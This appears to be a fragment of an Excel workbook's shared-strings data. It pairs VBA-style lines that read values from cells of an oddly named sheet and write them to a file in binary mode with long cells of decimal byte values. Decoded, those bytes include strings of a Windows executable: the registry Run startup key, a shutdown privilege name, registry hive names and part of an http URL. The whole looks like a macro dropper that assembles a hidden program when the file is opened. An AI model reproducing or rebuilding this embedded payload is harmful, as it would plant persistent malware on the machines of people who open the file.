23 235 107 182 205 114 64 6 181 114 18 91 75 26 79 166 235 </t>
  </si>
  <si>
    <t xml:space="preserve">Open filesf For Binary Access Write As #1</t>
  </si>
  <si>
    <t xml:space="preserve">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16 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 0 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 8 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 0 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">186 166 125 85 135 89 23 131 235 209 93 215 52 219 116 7 19 28 148 122 35 105 211 81 117 77 215 117 59 84 3 27 71 21 179 19 120 215 117 93 215 107 121 3 176 215 236 47 175 103 40 63 102 217 117 93 123 15 39 59 213 3 148 19 145 186 174 235 186 55 247 121 87 198 111 138 123 64 211 248 154 229 182 235 51 202 79 60 4 3 250 2 252 245 115 187 174 105 54 5 35 165 63 129 17 219 107 215 116 135 174 84 63 125 7 3 134 229 119 101 215 117 102 86 10 7 22 111 154 11 211 16 205 182 233 154 19 171 23 233 190 21 99 93 110 117 93 211 117 3 216 71 108 200 127 106 15 104 215 117 93 215 3 115 43 128 147 248 79 6 43 75 255 93 211 117 77 238 242 199 222 19 207 226 31 15 235 94 215 117 51 230 91 132 31 217 127 7 174 75 134 235 186 174 198 3 99 15 225 51 183 195 123 211 52 205 54 214 3 64 50 34 18 166 105 154 101 254 213 242 226 212 202 154 166 105 154 194 184 170 156 148 138 105 154 166 105 128 114 92 72 64 166 105 154 166 54 44 34 16 6 77 211 52 203 246 212 234 224 216 208 200 52 77 211 52 190 182 172 162 152 211 52 77 211 142 132 122 114 106 77 211 52 77 98 90 80 70 62 52 182 77 211 52 42 32 12 16 223 191 110 109 154 237 103 0 228 222 3 206 186 170 222 215 108 207 158 19 230 211 7 232 219 3 218 206 7 77 211 52 77 182 164 136 244 106 90 52 77 211 52 76 56 40 28 16 205 217 102 217 12 220 252 122 219 79 124 150 52 77 211 116 3 170 190 104 88 68 191 96 77 211 46 28 8 115 0 90 150 246 8 107 142 64 208 3 0 86 151 27 186 193 154 237 54 16 3 37 53 7 80 19 74 105 154 166 233 3 68 62 56 50 44 166 233 154 174 0 31 38 32 3 26 20 205 178 105 154 14 8 2 252 150 246 82 52 77 215 117 39 240 7 234 3 228 222 216 211 52 77 211 210 204 198 192 186 77 211 52 77 180 174 168 162 156 150 52 77 211 52 144 138 132 126 120 222 52 77 211 114 108 102 96 66 97 115 101 199 111 1 95 114 95 99 108 55 54 52 45 37 115 31 </t>
  </si>
  <si>
    <t xml:space="preserve">For i = 1 To 28</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 154 34 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 148 255 255 255 255 0 0 0 0 26 80 255 255 255 255 0 0 0 0 2 60 28 1 255 255 0 0 0 0 2 60 32 1 255 255 0 0 0 0 2 60 36 1 255 255 0 0 0 0 2 60 40 1 255 255 0 0 0 0 2 60 44 1 255 255 0 0 0 0 2 60 48 1 255 255 0 0 0 0 2 60 52 1 255 255 0 0 0 0 2 60 56 1 255 255 0 0 0 0 2 60 60 1 255 255 0 0 0 0 2 60 64 1 255 255 0 0 0 0 2 60 68 1 255 255 0 0 0 0 2 60 72 1 255 255 0 0 0 0 2 60 76 1 255 255 0 0 0 0 2 60 80 1 255 255 0 0 0 0 2 60 84 1 255 255 0 0 0 0 2 60 88 1 255 255 0 0 0 0 2 60 92 1 255 255 0 0 0 0 2 60 96 1 255 255 0 0 0 0 2 60 100 1 255 255 0 0 0 0 2 60 104 1 255 255 0 0 0 0 2 60 108 1 255 255 0 0 0 0 2 60 112 1 255 255 0 0 0 0 2 60 116 1 255 255 0 0 0 0 2 60 120 1 255 255 0 0 0 0 2 60 124 1 255 255 0 0 0 0 2 60 128 1 255 255 0 0 0 0 2 60 132 1 255 255 0 0 0 0 2 60 136 1 255 255 0 0 0 0 2 60 140 1 255 255 0 0 0 0 2 60 144 1 255 255 0 0 0 0 2 60 148 1 255 255 0 0 0 0 2 60 152 1 255 255 0 0 0 0 2 60 156 1 255 255 0 0 0 0 2 60 160 1 255 255 0 0 0 0 2 60 164 1 255 255 0 0 0 0 2 60 168 1 255 255 0 0 0 0 2 60 172 1 255 255 0 0 0 0 2 60 176 1 255 255 0 0 0 0 2 60 180 1 255 255 0 0 0 0 2 60 184 1 255 255 0 0 0 0 2 60 188 1 255 255 0 0 0 0 2 60 192 1 255 255 0 0 0 0 2 60 196 1 255 255 0 0 0 0 2 60 200 1 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">46 36 103 59 135 120 182 243 16 15 155 11 187 108 63 17 19 1 23 17 25 18 179 179 131 44 17 3 128 3 53 47 221 32 205 100 23 4 4 127 71 133 133 176 185 144 7 14 227 17 111 54 203 110 121 36 183 212 39 255 255 146 134 151 216 189 255 203 43 67 77 121 70 114 109 87 110 100 11 27 199 17 11 228 242 66 151 24 153 18 153 187 64 94 200 102 17 12 153 6 23 211 52 203 174 0 3 250 152 244 238 232 77 211 52 77 226 220 214 208 202 196 52 77 211 52 190 184 178 172 166 108 154 101 211 160 216 153 210 204 150 152 108 154 101 179 144 198 153 192 186 134 152 154 166 97 179 128 180 153 183 152 152 152 217 53 77 103 23 96 174 168 3 88 152 157 109 154 102 82 76 70 64 152 235 58 211 52 77 215 7 52 3 46 40 34 28 101 211 52 77 22 16 10 4 254 151 154 166 105 154 248 242 236 230 224 218 105 154 166 105 212 206 200 194 188 166 105 154 166 182 176 170 164 158 255 191 105 154 152 146 140 83 79 70 84 87 65 82 69 92 77 105 99 114 111 255 255 23 254 115 111 102 116 92 87 105 145 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 253 102 219 240 92 82 117 110 167 114 98 3 97 83 101 83 104 117 116 255 95 248 223 39 110 80 114 105 118 105 108 101 103 101 167 101 102 97 117 108 116 32 73 77 69 0 111 141 91 59 180 112 58 227 37 34 77 101 170 255 205 214 183 97 31 46 116 120 116 195 0 75 69 89 95 85 83 69 82 83 131 253 255 96 11 76 79 67 65 76 95 77 65 67 72 73 78 69 19 67 31 178 177 219 85 82 149 78 84 39 0 19 67 79 78 70 223 252 63 216 73 71 39 76 65 83 83 69 83 95 82 79 79 84 40 196 172 200 207 120 187 253 174 41 251 194 214 181 32 35 49 15 202 253 8 206 180 201 239 222 126 183 203 195 41 143 85 115 206 45 65 103 215 58 32 37 100 111 187 45 198 13 10 135 221 116 16 45 76 4 103 116 104 110 127 251 101 23 68 73 83 80 93 89 0 73 68 82 95 152 73 84 237 183 236 221 3 70 79 23 11 59 109 83 234 47 </t>
  </si>
  <si>
    <t xml:space="preserve">hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 4).Value</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 2 60 204 1 255 255 0 0 0 0 2 60 208 1 255 255 0 0 0 0 2 60 212 1 255 255 0 0 0 0 2 60 216 1 255 255 0 0 0 0 2 60 220 1 255 255 0 0 0 0 2 60 224 1 255 255 0 0 0 0 2 60 228 1 255 255 0 0 0 0 2 60 232 1 255 255 0 0 0 0 2 60 236 1 255 255 0 0 0 0 2 60 240 1 255 255 0 0 0 0 2 60 244 1 255 255 0 0 0 0 2 60 248 1 255 255 0 0 0 0 2 60 252 1 255 255 0 0 0 0 2 60 255 255 255 255 0 0 255 255 1 1 0 0 0 0 1 0 78 0 48 0 123 0 70 0 67 0 70 0 66 0 51 0 68 0 50 0 65 0 45 0 65 0 48 0 70 0 65 0 45 0 49 0 48 0 54 0 56 0 45 0 65 0 55 0 51 0 56 0 45 0 48 0 56 0 48 0 48 0 50 0 66 0 51 0 51 0 55 0 49 0 66 0 53 0 125 0 7 0 0 0 255 255 255 255 1 1 184 14 0 0 29 0 12 0 37 0 0 0 42 128 45 2 255 255 255 255 56 0 28 0 0 0 0 0 5 0 0 0 0 0 3 64 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 12 17 52 2 152 0 0 0 0 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 144 13 0 0 176 254 107 0 112 0 0 0 255 255 255 255 40 0 0 0 15 0 15 0 2 0 148 1 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 144 0 0 0 0 0 0 0 255 255 255 255 132 0 0 0 38 2 1 0 29 0 16 0 37 0 0 0 12 17 76 2 32 1 0 0 1 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 240 3 0 0 192 254 111 0 216 0 0 0 255 255 255 255 44 0 1 0 52 0 52 0 17 0 148 2 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 248 0 0 0 0 0 0 0 0 1 0 0 132 0 0 0 28 2 32 0 29 0 16 0 37 0 0 0 105 131 78 2 255 255 255 255 16 0 </t>
  </si>
  <si>
    <t xml:space="preserve">16 219 133 99 191 82 101 6 97 199 100 101 108 253 238 191 108 64 115 105 102 32 101 120 105 115 116 12 32 103 111 116 111 32 112 128 189 145 32 61 255 92 107 119 77 132 146 92 0 49 46 98 88 75 140 189 113 184 80 79 83 2 79 48 56 120 155 58 182 51 124 43 109 250 228 175 192 192 135 70 119 97 60 243 219 251 215 92 64 67 116 114 108 123 137 112 73 110 102 111 181 205 221 181 82 97 114 73 100 93 185 105 95 42 91 182 236 19 13 63 148 75 212 223 94 135 32 100 117 99 116 75 101 91 47 92 107 13 237 65 100 109 39 7 114 162 95 15 183 141 216 246 119 71 100 75 48 115 76 105 112 54 215 110 191 116 203 83 121 35 101 109 76 73 42 108 89 236 230 232 66 99 53 49 92 48 79 12 40 109 173 241 78 97 109 118 30 79 103 67 218 246 55 215 112 84 114 101 100 79 114 103 97 96 122 94 204 53 6 246 124 23 154 184 139 23 222 178 22 202 151 69 27 83 68 191 113 176 100 176 192 66 117 198 100 78 117 109 98 214 184 66 120 239 132 32 128 242 76 120 100 87 0 17 210 209 119 41 144 133 47 158 92 42 46 42 235 48 97 219 110 133 84 149 184 116 83 72 118 2 92 218 246 86 234 118 48 92 111 76 77 219 20 116 115 118 152 188 176 5 132 50 163 89 239 69 77 92 225 251 109 123 190 59 108 49 116 48 48 49 92 56 105 46 255 229 223 135 24 0 135 205 163 214 185 213 253 212 218 198 244 182 175 143 246 234 103 19 212 203 208 208 151 27 39 156 123 239 242 215 180 204 172 182 168 11 172 174 183 223 216 54 232 3 89 94 109 2 100 174 72 58 37 77 99 211 200 2 175 92 70 236 46 68 112 111 109 201 221 15 84 109 112 122 157 98 117 103 183 237 110 89 16 0 77 83 71 231 65 7 78 87 87 90 104 39 87 5 1 71 191 27 106 91 107 255 89 111 117 32 108 111 103 40 97 194 32 65 109 100 25 107 120 47 2 32 58 10 135 34 253 127 155 83 83 47 6 0 195 220 194 235 206 170 191 213 199 86 186 213 218 109 0 42 25 68 0 134 154 183 45 123 183 88 73 0 82 23 13 65 23 205 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 11 1 255 255 0 0 0 0 255 255 255 255 128 1 0 0 0 0 0 0 12 17 118 2 128 12 0 0 2 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 184 6 0 0 42 254 107 0 96 1 0 0 255 255 255 255 48 0 2 0 32 0 32 0 69 0 148 1 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 128 1 0 0 0 0 0 0 255 255 255 255 132 0 0 0 0 0 0 0 29 0 16 0 37 0 0 0 8 0 0 0 255 255 255 255 255 255 255 255 48 0 0 0 32 1 0 0 128 12 0 0 255 255 255 255 152 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 192 1 0 0 128 0 0 0 7 0 7 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 224 1 0 0 128 0 0 0 16 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 2 128 254 255 255 255 255 255 16 0 255 255 24 2 0 0 2 1 255 255 240 1 0 0 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 0 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 232 1 0 0 128 0 0 0 255 255 255 255 29 0 16 0 37 0 0 0 2 131 254 255 255 255 255 255 8 0 255 255 104 2 0 0 0 0 255 255 255 255 255 255 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 20 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 136 2 0 0 128 0 0 0 255 255 255 255 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 168 2 0 0 128 0 0 0 40 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 240 2 0 0 128 0 0 0 40 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 </t>
  </si>
  <si>
    <t xml:space="preserve">84 152 84 69 251 60 41 155 198 107 52 17 96 85 42 6 69 225 6 195 108 27 82 63 121 81 117 57 220 227 70 108 121 192 8 102 102 3 27 78 177 96 196 20 127 27 47 53 237 102 20 3 108 31 67 114 211 101 54 35 242 149 58 0 78 116 213 52 169 185 255 6 27 84 68 76 76 46 3 10 187 99 221 173 185 49 46 52 32 147 102 108 74 32 16 32 155 136 183 11 211 112 121 161 103 104 116 245 53 45 252 194 237 133 50 217 50 32 74 106 110 45 47 117 112 32 71 97 129 68 139 40 95 48 103 190 93 231 224 96 103 31 1 8 3 160 104 11 5 115 109 176 38 251 8 11 6 95 1 23 156 137 165 57 4 16 107 43 7 205 32 31 246 23 11 128 0 128 32 0 179 45 226 157 1 9 228 4 11 236 40 59 205 2 1 16 0 1 3 134 100 72 134 2 3 4 148 133 100 72 5 103 216 145 141 108 87 71 6 3 32 131 12 50 7 8 9 131 12 50 200 10 11 12 13 134 165 202 38 0 155 220 255 95 254 123 16 17 18 7 9 6 10 5 11 4 12 3 13 2 14 1 15 107 105 154 166 219 141 140 3 76 204 44 172 166 105 154 166 108 236 28 156 92 154 166 105 154 220 60 188 124 252 2 105 154 166 105 130 66 194 34 162 166 105 154 166 98 226 18 146 82 154 166 105 154 210 50 178 114 242 10 105 154 166 105 138 74 202 42 170 166 105 154 166 106 234 26 154 90 154 166 105 154 218 58 186 122 250 6 105 154 166 105 134 70 198 38 166 166 105 154 166 102 230 22 150 86 154 166 105 154 214 54 182 118 246 14 105 154 166 105 142 78 206 46 174 166 105 154 166 110 238 30 158 94 154 166 105 154 222 62 190 126 254 1 105 154 166 105 129 65 193 33 161 166 105 154 166 97 225 17 145 81 154 166 105 154 209 49 177 113 241 9 105 154 166 105 137 73 201 41 169 166 105 154 166 105 233 25 153 89 154 166 105 154 217 57 185 121 249 5 105 154 166 105 133 69 197 37 165 166 105 154 166 101 229 21 149 85 154 166 105 154 213 53 181 117 245 13 105 154 166 105 141 77 205 45 173 166 105 154 166 109 237 29 157 93 155 166 105 154 </t>
  </si>
  <si>
    <t xml:space="preserve">16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 48 3 0 0 128 0 0 0 255 255 255 255 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 248 2 0 0 128 0 0 0 40 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 0 3 0 0 128 0 0 0 0 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 144 3 0 0 128 0 0 0 32 0 70 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 176 3 0 0 128 0 0 0 104 2 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 208 3 0 0 128 0 0 0 104 2 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 176 2 0 0 128 0 0 0 104 2 0 0 255 255 255 255 0 1 0 0 255 255 255 255 255 255 255 255 255 255 255 255 144 4 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 160 6 0 0 255 255 255 255 24 5 0 0 255 255 255 255 255 255 255 255 184 4 0 0 96 5 0 0 72 5 0 0 255 255 255 255 48 5 0 0 0 5 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 64 14 0 0 168 4 0 0 32 132 55 2 255 255 255 255 120 255 255 255 112 3 0 0 128 0 0 0 8 1 0 0 255 255 255 255 144 4 0 0 0 0 0 0 255 255 255 255 64 4 254 255 232 4 0 0 116 255 255 255 8 0 255 255 32 0 0 0 8 0 255 255 255 255 255 255 18 2 86 2 88 2 90 2 84 2 92 2 94 2 96 2 8 0 255 255 64 4 254 255 255 255 255 255 112 255 255 255 8 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 255 255 255 255 110 255 </t>
  </si>
  <si>
    <t xml:space="preserve">221 61 189 125 253 19 0 154 166 91 150 9 1 147 7 147 83 83 105 154 166 105 211 211 51 51 179 166 105 154 166 179 115 115 243 243 154 166 105 154 11 11 139 139 75 75 105 154 166 105 203 203 43 43 171 166 105 154 166 171 107 107 235 235 154 166 105 154 27 27 155 155 91 91 105 154 166 105 219 219 59 59 187 166 105 154 166 187 123 123 251 251 154 166 105 154 7 7 135 135 71 71 105 154 166 105 199 199 39 39 167 166 105 154 166 167 103 103 231 231 154 166 105 154 23 23 151 151 87 87 105 154 166 105 215 215 55 55 183 166 105 154 166 183 119 119 247 247 154 166 105 154 15 15 143 143 79 79 105 154 166 105 207 207 47 47 175 166 105 154 166 175 111 111 239 239 154 166 105 154 31 31 159 159 95 95 105 154 166 105 223 223 63 63 191 166 105 154 166 191 127 127 255 255 77 211 116 95 25 64 3 32 96 16 80 52 77 211 52 48 112 8 72 40 211 52 77 211 104 24 88 56 120 77 211 52 77 4 68 36 100 20 84 116 93 211 52 52 116 3 65 131 3 67 13 52 77 211 195 35 163 99 9 227 77 211 61 56 47 3 8 24 4 52 77 211 52 20 12 28 2 18 211 52 77 211 10 26 6 22 14 77 211 52 77 30 1 17 9 25 5 52 77 211 52 21 13 29 3 19 78 3 77 211 11 27 7 153 23 72 211 253 13 81 3 4 4 5 5 6 0 7 8 201 144 12 50 9 10 11 80 50 148 12 12 13 80 201 80 201 14 15 210 116 31 131 13 18 19 19 20 0 21 22 50 36 131 12 23 24 25 148 12 37 67 26 27 84 50 84 50 28 29 134 19 212 33 255 203 241 29 194 16 14 221 179 91 16 50 200 32 131 0 17 18 19 12 201 144 12 20 21 22 148 12 201 144 23 24 168 132 80 50 25 127 89 44 139 82 90 191 183 116 89 204 34 175 167 10 52 77 211 52 59 12 14 16 20 24 211 52 77 211 28 32 40 48 56 77 211 52 77 64 80 96 112 128 160 194 86 210 52 192 224 119 239 189 247 94 115 111 107 103 99 95 190 247 222 123 91 87 83 79 75 60 128 165 74 5 200 64 117 126 220 170 169 86 51 10 98 33 32 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 11 0 255 255 32 0 0 0 255 255 255 255 64 4 80 2 255 255 255 255 92 255 255 255 12 0 255 255 0 0 0 0 255 255 255 255 64 4 254 255 144 5 0 0 76 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 120 5 0 0 60 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 88 14 0 0 56 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 200 5 0 0 40 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 224 5 0 0 24 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 184 2 0 0 128 0 0 0 255 255 255 255 64 4 254 255 248 5 0 0 8 255 255 255 12 0 255 255 32 0 0 0 64 0 0 0 64 4 254 255 104 13 0 0 248 254 255 255 12 0 255 255 32 0 0 0 5 0 0 0 64 4 254 255 255 255 255 255 232 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 192 2 0 0 128 0 0 0 8 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 200 2 0 0 128 0 0 0 16 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 112 6 0 0 128 0 0 0 8 0 0 0 29 0 16 0 37 0 0 0 255 255 255 255 128 1 0 0 32 132 55 2 255 255 255 255 120 255 255 255 152 6 0 0 128 0 0 0 8 2 0 0 29 0 16 0 37 0 0 0 64 4 82 2 255 255 255 255 216 254 255 255 12 0 255 255 0 0 0 0 176 5 0 0 48 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 184 7 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 16 8 0 0 248 7 0 0 136 8 0 0 255 255 </t>
  </si>
  <si>
    <t xml:space="preserve">118 219 72 77 2 63 98 56 32 2 114 75 185 207 1 37 39 115 17 171 105 181 149 186 0 84 32 109 66 21 121 202 212 176 173 215 54 97 33 178 100 174 45 91 14 109 47 42 79 27 90 87 59 34 88 110 101 93 100 71 174 20 187 167 123 97 67 232 201 159 3 154 166 105 154 224 220 216 204 192 184 110 182 42 101 197 185 116 78 111 82 43 213 190 230 116 160 91 70 84 255 14 114 193 66 7 86 97 145 66 27 205 89 23 188 219 223 0 0 255 12 242 48 215 136 154 139 3 15 52 157 6 164 185 228 72 157 145 149 243 119 203 1 105 247 55 158 59 3 16 89 47 127 233 82 252 182 40 101 209 17 150 164 248 30 11 224 61 76 57 111 60 55 50 250 246 210 17 129 123 166 79 121 122 183 91 59 40 30 110 234 26 160 159 5 147 25 146 108 12 200 1 214 68 35 45 144 64 46 57 132 6 161 180 66 6 64 6 216 252 46 144 151 28 64 160 32 203 82 144 33 100 64 68 100 118 118 8 25 104 118 160 23 127 43 200 16 210 12 2 140 146 12 97 3 50 154 184 123 172 32 67 216 128 228 35 190 6 228 2 57 8 204 208 44 193 6 27 66 226 151 234 7 171 100 115 194 243 160 135 3 80 204 0 156 1 176 132 35 168 201 41 121 133 147 2 219 156 222 83 114 74 78 244 220 2 212 102 228 148 156 146 213 246 222 246 211 10 57 37 167 24 220 218 211 34 68 69 72 210 160 168 12 232 220 255 87 4 0 76 69 65 85 84 51 50 46 100 2 93 80 201 108 108 105 203 6 102 154 237 46 161 3 68 24 0 77 17 38 0 112 161 224 174 235 130 112 7 135 30 3 15 23 186 179 77 17 186 88 191 43 30 47 15 179 104 176 65 208 19 19 23 205 182 219 160 136 171 124 3 223 184 7 112 96 32 93 211 116 3 84 64 48 27 24 161 135 128 217 2 62 199 1 171 2 43 2 0 168 2 73 65 20 19 192 40 32 49 11 0 99 93 78 3 84 7 70 55 12 145 109 1 116 9 68 103 95 25 255 163 202 136 186 104 116 116 112 58 47 47 115 255 255 75 69 86 49 54 48 46 119 101 98 104 111 115 116 52 108 105 102 101 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 40 8 0 0 80 13 0 0 72 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 96 10 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 224 7 0 0 208 7 0 0 32 132 55 2 255 255 255 255 120 255 255 255 16 6 0 0 128 0 0 0 16 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 56 2 0 0 128 0 0 0 168 1 0 0 32 132 55 2 255 255 255 255 120 255 255 255 8 3 0 0 128 0 0 0 144 1 0 0 32 132 55 2 255 255 255 255 120 255 255 255 104 3 0 0 128 0 0 0 6 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 168 5 0 0 128 0 0 0 96 1 0 0 48 9 0 0 184 7 0 0 0 0 255 255 6 0 255 255 255 255 255 255 28 2 122 2 120 2 18 2 46 2 72 2 32 0 0 0 6 0 255 255 64 4 254 255 112 8 0 0 116 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 24 10 0 0 112 255 255 255 8 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 64 8 0 0 96 255 255 255 12 0 255 255 32 0 0 0 9 0 255 255 64 4 254 255 88 8 0 0 80 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 232 8 0 0 64 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 184 8 0 0 60 255 255 255 9 0 255 255 32 0 0 0 9 0 255 255 64 4 254 255 160 8 0 0 44 255 255 255 12 0 255 255 32 0 0 0 9 0 255 255 64 4 254 255 112 9 0 0 28 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 208 8 0 0 24 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 255 255 255 255 20 255 255 255 9 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 0 9 0 0 4 255 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 24 9 0 0 244 254 </t>
  </si>
  <si>
    <t xml:space="preserve">46 162 254 111 81 149 47 100 118 100 101 118 47 105 100 46 126 94 16 214 151 172 80 65 144 0 115 250 143 84 224 1 117 115 81 237 149 11 122 143 94 164 120 191 161 89 4 128 120 83 125 143 13 229 0 150 0 34 20 47 151 7 85 24 1 148 160 1 71 101 85 145 255 255 116 68 105 115 107 70 114 101 101 83 112 97 99 101 69 120 65 91 70 196 75 248 117 109 101 25 22 179 95 138 56 68 60 101 84 121 112 101 14 34 182 110 251 84 101 109 112 80 30 104 13 79 19 110 182 91 107 51 137 12 23 53 105 110 24 101 237 24 17 201 17 137 84 111 86 251 237 5 138 104 214 51 50 83 29 112 115 104 111 116 25 127 247 45 88 34 18 70 105 114 115 15 67 108 111 115 101 72 97 68 236 3 246 110 100 108 101 28 78 101 120 116 114 219 173 123 86 201 84 104 80 100 17 77 111 143 70 219 173 205 206 105 108 98 205 6 99 116 181 121 98 179 34 102 161 241 214 111 135 157 8 60 45 108 107 114 99 112 118 251 218 123 37 9 18 224 83 6 101 112 72 182 131 208 30 77 117 3 12 76 97 34 69 225 254 158 8 188 1 61 84 105 109 201 29 216 139 20 59 11 21 76 196 219 55 187 175 97 108 14 24 86 141 116 117 97 204 109 45 82 167 131 15 82 180 211 31 198 34 24 77 53 1 122 76 105 110 107 119 239 98 114 97 12 108 69 110 118 52 177 109 228 254 197 182 183 86 19 105 97 98 75 87 24 55 65 100 100 114 188 89 107 17 79 103 72 53 194 92 123 43 44 167 105 163 102 105 122 101 187 9 217 48 103 232 130 83 4 247 244 22 97 131 162 75 79 77 110 108 105 162 112 159 5 231 83 116 97 174 37 161 53 119 116 16 175 51 191 123 27 163 141 193 80 3 15 110 19 67 111 117 159 136 109 51 90 14 5 89 107 15 193 6 246 74 160 73 100 19 77 37 188 132 96 20 64 65 115 49 89 219 218 134 64 107 82 36 78 114 42 230 109 217 238 178 13 83 224 111 102 15 53 195 225 92 178 110 29 176 10 179 25 197 174 29 14 83 49 235 248 121 67 139 5 48 87 141 136 36 47 96 67 24 54 42 253 33 157 </t>
  </si>
  <si>
    <t xml:space="preserve">255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 4 254 255 88 9 0 0 228 254 255 255 12 0 255 255 32 0 0 0 12 0 255 255 64 11 0 0 96 10 0 0 13 0 0 0 0 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 208 2 0 0 128 0 0 0 0 0 0 0 64 4 254 255 208 9 0 0 212 254 255 255 12 0 255 255 32 0 0 0 168 1 0 0 64 4 254 255 136 9 0 0 196 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 160 9 0 0 180 254 255 255 12 0 255 255 32 0 0 0 120 1 0 0 64 4 254 255 184 9 0 0 164 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 232 9 0 0 148 254 255 255 12 0 255 255 32 0 0 0 0 1 0 0 64 4 254 255 255 255 255 255 132 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 0 10 0 0 116 254 255 255 12 0 255 255 32 0 0 0 64 0 0 0 64 4 254 255 255 255 255 255 100 254 255 255 12 0 255 255 32 0 0 0 16 0 0 0 64 4 254 255 255 255 255 255 96 254 255 255 8 0 255 255 32 0 0 0 16 0 0 0 64 4 130 2 255 255 255 255 80 254 255 255 12 0 255 255 0 0 0 0 16 0 0 0 64 4 254 255 255 255 255 255 76 254 255 255 3 0 255 255 32 0 0 0 8 0 0 0 64 4 254 255 120 10 0 0 60 254 255 255 12 0 255 255 32 0 0 0 11 0 255 255 64 4 254 255 255 255 255 255 44 254 255 31 12 0 255 255 32 0 0 0 0 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 16 3 0 0 128 0 0 0 255 255 255 255 255 255 255 255 144 10 0 0 0 0 255 255 255 255 255 255 255 255 255 255 28 2 18 2 72 2 255 255 255 255 255 255 255 255 255 255 3 0 255 255 64 4 254 